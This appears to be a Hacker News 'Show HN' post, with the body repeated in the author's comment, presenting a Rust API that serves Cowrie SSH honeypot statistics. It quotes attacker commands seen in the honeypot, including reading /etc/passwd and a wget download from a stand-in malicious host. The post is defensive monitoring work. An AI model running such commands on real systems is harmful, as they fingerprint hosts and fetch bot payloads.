Show HN: I built a Rust API to expose my SSH honeypot data in real time
I've been running a Cowrie SSH honeypot on my VPS for a while and got tired of SSHing in to grep through logs. So I built a small REST API in Rust (Axum) that parses Cowrie's JSON logs and serves aggregated stats — top IPs, passwords, usernames, commands, sessions, the whole thing.
It's called cowrie-api and it's part of a larger project I'm calling the fenrir honeypot stack.
What it does
Cowrie logs every SSH connection attempt to a JSON file. cowrie-api tails that file and exposes it over HTTP. There are endpoints for aggregated stats, every login attempt with a success/fail flag, every command typed by attackers in fake shell sessions, activity grouped by session ID, and a health check showing log file status.
The fun part is the sessions endpoint. When an attacker gets past the login prompt (Cowrie accepts any credentials), you can see exactly what they typed in the fake shell — uname -a, cat /etc/passwd, wget http://malicious.example.com/bot.sh. It's a window into what automated attacks actually do once they're "in".
Why Rust
Honestly, partly to learn it. But also — this thing runs on the same VPS as everything else and I wanted it to be as lightweight as possible. The binary is small, memory usage is negligible, and Axum made building the API surprisingly pleasant once I got past the type system fighting me.
What I found after a few days of data
root and admin account for the vast majority of attempts. Password 123456 is still the most tried password in 2026. Most bots don't bother running commands even after a "successful" login — they just disconnect. Probably checking if the port is open for a later payload. The ones that do run commands almost always start with uname -a to fingerprint the system.
Stack
Rust + Axum, Cowrie (Python SSH honeypot), Docker Compose, deployed behind Traefik on a Dokploy VPS.
The API is live and serving real data from my honeypot at vinhegewald.de/project-fenrir if you want to see actual attack traffic.
sirgeon•1h ago
I've been running a Cowrie SSH honeypot on my VPS for a while and got tired of SSHing in to grep through logs. So I built a small REST API in Rust (Axum) that parses Cowrie's JSON logs and serves aggregated stats — top IPs, passwords, usernames, commands, sessions, the whole thing.
It's called cowrie-api and it's part of a larger project I'm calling the fenrir honeypot stack.
What it does
Cowrie logs every SSH connection attempt to a JSON file. cowrie-api tails that file and exposes it over HTTP. There are endpoints for aggregated stats, every login attempt with a success/fail flag, every command typed by attackers in fake shell sessions, activity grouped by session ID, and a health check showing log file status.
The fun part is the sessions endpoint. When an attacker gets past the login prompt (Cowrie accepts any credentials), you can see exactly what they typed in the fake shell — uname -a, cat /etc/passwd, wget http://malicious.example.com/bot.sh. It's a window into what automated attacks actually do once they're "in".
Why Rust
Honestly, partly to learn it. But also — this thing runs on the same VPS as everything else and I wanted it to be as lightweight as possible. The binary is small, memory usage is negligible, and Axum made building the API surprisingly pleasant once I got past the type system fighting me.
What I found after a few days of data
root and admin account for the vast majority of attempts. Password 123456 is still the most tried password in 2026. Most bots don't bother running commands even after a "successful" login — they just disconnect. Probably checking if the port is open for a later payload. The ones that do run commands almost always start with uname -a to fingerprint the system.
Stack
Rust + Axum, Cowrie (Python SSH honeypot), Docker Compose, deployed behind Traefik on a Dokploy VPS.
The API is live and serving real data from my honeypot at vinhegewald.de/project-fenrir if you want to see actual attack traffic.
Repo: https://github.com/sirgeon/cowrie-api
Would love feedback on the Rust code especially — still learning idiomatic patterns.